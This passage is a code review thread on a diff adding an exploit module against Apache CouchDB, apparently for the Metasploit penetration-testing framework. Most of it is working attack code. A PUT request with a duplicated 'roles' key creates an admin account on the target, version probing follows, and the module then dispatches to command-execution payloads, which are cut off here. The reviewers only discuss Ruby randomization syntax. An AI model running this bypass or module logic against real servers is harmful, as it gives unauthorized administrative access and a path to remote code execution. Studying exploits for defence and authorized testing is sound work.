modules/exploits/linux/http/apache_couchdb_cmd_exec.rb

```diff
@@ -0,0 +1,371 @@
+  # the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization
+  # for the newly created user.
+  def auth_bypass
+
+    username = datastore['HttpUsername'] || Rex::Text.rand_text_alpha_lower(rand(8) + 4)
+    password = datastore['HttpPassword'] || Rex::Text.rand_text_alpha_lower(rand(8) + 4)
+    @auth = basic_auth(username, password)
+
+    res = send_request_cgi(
+      'uri'           => normalize_uri(target_uri.path, "/_users/org.couchdb.user:#{username}"),
+      'method'        => 'PUT',
+      'ctype'         => 'application/json',
+      'data'          => %Q{{"type": "user","name": "#{username}","roles": ["_admin"],"roles": [],"password": "#{password}"}}
+    )
+
+    if res && res.code == 200 && res.get_json_document['ok']
+      return true
+    else
+      return false
+    end
+
+  end
+
+  def get_version
+    version = nil
+
+    begin
+      res = send_request_cgi(
+          'uri'           => normalize_uri(target_uri.path),
+          'method'        => 'GET',
+          'authorization' => @auth
+        )
+
+      temp = res.get_json_document if res
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, Rex::ConnectionTimeout => e
+      fail_with(Failure::Unreachable, "#{peer} - Connection failed")
+      return version
+
+    rescue JSON::ParserError
+      print_warning("#{peer} - Cannot parse the response, is it CouchDB?")
+      return version
+    end
+
+    unless res
+      print_bad("#{peer} - No response, check if it is CouchDB. ")
+      fail_with(Failure::UnexpectedReply, "#{peer} - No response, check if it is CouchDB.")
+    end
+
+    if res && res.code == 401
+      print_bad("#{peer} - Authentication required.")
+      fail_with(Failure::NoAccess, "#{peer} - Authentication required.")
+    end
+
+    if res && res.code == 200
+      if temp['version']
+          version = temp['version']
+        else
+          vprint_warning("#{peer} - Version not found")
+      end
+    end
+
+    version
+
+  end
+
+  def send_payload(version)
+    vprint_status("#{peer} - version is #{version}") if version
+
+    case
+    when version < '1.7.0'
+      payload1
+    when version.between?('2.0.0','2.1.0')
+      payload2
+    when version >= '1.7.0' || version > '2.1.0'
+      fail_with(Failure::NotVulnerable, "#{peer} - The target is not vulnerable.")
+    else
+      # Version not found, try randomly payload
+      vprint_warning("#{peer} - Cannot retrive the version, exploiting randomly...")
+      send([:payload1,:payload2].sample)
+
+    end
+
+  end
+
+  # Exploit with multi requests
+  # payload1 is for the version of couchdb below 1.7.0
+  def payload1
+
+    rand_cmd1 = Rex::Text.rand_text_alpha_lower(rand(8) + 4)
+    rand_cmd2 = Rex::Text.rand_text_alpha_lower(rand(8) + 4)
+    rand_db = Rex::Text.rand_text_alpha_lower(rand(8) + 4)
+    rand_doc = Rex::Text.rand_text_alpha_lower(rand(8) + 4)
```

Comment:
The randomization could be rewritten as:

```ruby
Rex::Text.rand_text_alpha_lower(4..12)
```

This is easier to read.

Reply:
This was my bad. `rand_text_alphanumeric` doesn't support ranges, but `rand` does.

I meant this:

```ruby
rand_text_alphanumeric_lower rand(4..12)
```

Reply:
Aww, I was hoping to make it and the other methods take a range. :-)

Reply:
That would work too.

#9837 @ wvu

Reply:
Joking aside, this has kinda bothered me in the past.

Reply:
FWIW, `rand` has supported ranges since 1.9.3. Converting to an array and using `sample` is obsolete and inefficient.

Reply:
FWIW, `rand` has supported ranges since 1.9.3. Anything else is obsolete and inefficient.

Reply:
Thanks for your work.